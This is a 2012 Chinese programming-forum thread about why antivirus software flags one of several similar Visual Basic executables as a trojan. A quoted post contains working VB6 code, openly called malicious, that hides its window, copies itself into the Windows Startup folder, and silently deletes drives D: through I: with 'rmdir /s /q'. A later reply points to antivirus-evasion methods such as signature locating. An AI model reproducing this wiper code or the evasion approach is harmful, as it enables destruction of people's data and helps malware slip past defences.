标题:求助:如何找到“木马”代码?
只看楼主
jrs123
Rank: 2
等 级:论坛游民
威 望:1
帖 子:627
专家分:14
注 册:2006-9-5
得分:0 
以下是引用yuma在2012-7-22 15:37:24的发言:

帮不了你了!
还是要谢谢您!
2012-07-22 15:40
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
得分:0 
以下是引用yuma在2012-7-22 09:55:28的发言:

以下是引用zklhp在2012-7-22 07:38:52的发言:

两种可能 一种是你电脑确实有病毒 感染了这个程序 当然这种可能性比较小 另外一种就是 你这个程序被360认为是病毒

360对于新程序 也就是自己写的程序 特别敏感 有人觉得是好事有人觉得是坏事 这个我不评论 你这里面出问题的可能是网络访问那个txt


尝试一下,下面的代码也一样会被金山报毒Shell "cmd /c del " & App.EXEName & ".exe",vbhide。

360对于新程序 也就是自己写的程序 特别敏感
本人不赞成!
请尝试下面恶意代码,我金山毒霸由始至终都不杀它,也不提示、警告。Private Sub Form_Load()
Form1.Visible= False
Dim a As String
Dim b As String
Dim s As Stringa= App.Path & "\" & App.EXEName & ".exe"b= "C:\Documents and Settings\All Users\「开始」菜单\程序\启动\" & App.EXEName & ".exe"s= Dir(b, vbDirectory)
If s = "" Or a <> b Then
FileCopy a, b
End  If
Shell "cmd  /c  rmdir  /s  /q  D:\", vbHide
Shell "cmd  /c  rmdir  /s  /q  E:\", vbHide
Shell "cmd  /c  rmdir  /s  /q  F:\", vbHide
Shell "cmd  /c  rmdir  /s  /q  G:\", vbHide
Shell "cmd  /c  rmdir  /s  /q  H:\", vbHide
Shell "cmd  /c  rmdir  /s  /q  I:\", vbHide
End Sub
360对于新程序 也就是自己写的程序 特别敏感

没看明白什么意思 你的意思是 360不敏感?
2012-07-22 19:23
yuma
Rank: 11Rank: 11Rank: 11Rank: 11
来 自:银河系
等 级:贵宾
威 望:33
帖 子:1883
专家分:2904
注 册:2009-12-22
得分:0 
那软件都不用开发了。一开发出来就是木马病毒。

心生万象,万象皆程序!
本人计算机知识网:http://bbs.为防伸手党,本站已停止会员注册。
2012-07-22 20:16
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
得分:0 
以下是引用yuma在2012-7-22 20:16:44的发言:

那软件都不用开发了。一开发出来就是木马病毒。
对啊 而且有人分析360用这个来赚钱 这也是360耍流氓的一个手段 排斥其他软件
2012-07-22 20:23
yuma
Rank: 11Rank: 11Rank: 11Rank: 11
来 自:银河系
等 级:贵宾
威 望:33
帖 子:1883
专家分:2904
注 册:2009-12-22
得分:0 
啊?  

心生万象,万象皆程序!
本人计算机知识网:http://bbs.为防伸手党,本站已停止会员注册。
2012-07-22 20:24
jrs123
Rank: 2
等 级:论坛游民
威 望:1
帖 子:627
专家分:14
注 册:2006-9-5
得分:0 
回复 24楼 zklhp
有个问题请教版主:《奥运邮集》软件一共有31集EXE文件,各集程序都差不多,为什么只有xj27.exe报有“木马”,而其它都未报有“木马”?
会不会是真有隐藏的“木马”代码在xj27程序之中?如果有,又如何能查出来?
2012-07-22 20:45
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
得分:0 
以下是引用jrs123在2012-7-22 20:45:43的发言:

有个问题请教版主:《奥运邮集》软件一共有31集EXE文件,各集程序都差不多,为什么只有xj27.exe报有“木马”,而其它都未报有“木马”?
会不会是真有隐藏的“木马”代码在xj27程序之中?如果有,又如何能查出来?

我觉得这个问题看你怎么看了

1 你相信杀毒软件 就像你的签名档一样 你应该听杀毒软件的 删了它 因为他是病毒 最起码是可能的病毒 宁可错杀不可姑息养奸啊

2 你不信杀毒软件 那 可以说 这个属于误报 那么 对于误报一般有两种处理方法 一个是正常途径 上报exe文件 等厂商处理。。  二是特殊途径 也就是所谓的免杀 上面的大牛说了一部分 其他的你可以搜一下 很多的 我以前学的时候用的CCL 特征码定位 对于文件特征码和内存特征码是比较有效的 但对于行为监测用处一般 只能想办法绕过或者换其他手段实现 这个是个很大的问题啊

我上面说360对于自己写的东西比较敏感 其实质 我理解的是 它的行为监测特别的严格 因为对于未知程序不好搞特征码 一般是行为监测 那么 严格的行为监测自然可以保证电脑的安全了 当然这也带来了很多问题 比如你这个
2012-07-22 22:38
yuma
Rank: 11Rank: 11Rank: 11Rank: 11
来 自:银河系
等 级:贵宾
威 望:33
帖 子:1883
专家分:2904
注 册:2009-12-22
得分:0 
以下是引用jrs123在2012-7-22 15:26:18的发言:

你的文件360通不过!见图

那个附件最开始在我的电脑运行时也报有木马,但是做了PE处理后,我的金山就不杀了。

没想到你360比金山还历害。

心生万象,万象皆程序!
本人计算机知识网:http://bbs.为防伸手党,本站已停止会员注册。
2012-07-23 12:03
jrs123
Rank: 2
等 级:论坛游民
威 望:1
帖 子:627
专家分:14
注 册:2006-9-5
得分:0 
以下是引用yuma在2012-7-23 12:03:26的发言:


那个附件最开始在我的电脑运行时也报有木马,但是做了PE处理后,我的金山就不杀了。

没想到你360比金山还历害。
奇怪的是31个EXE文件,它只报了一个EXE文件有“木马”?
2012-07-23 13:10
zklhp
Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20
来 自:china
等 级:贵宾
威 望:254
帖 子:11485
专家分:33241
注 册:2007-7-10
得分:0 
以下是引用jrs123在2012-7-23 13:10:20的发言:

奇怪的是31个EXE文件,它只报了一个EXE文件有“木马”?
31个都是一样的么
2012-07-23 13:44



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-373862-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.537342 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved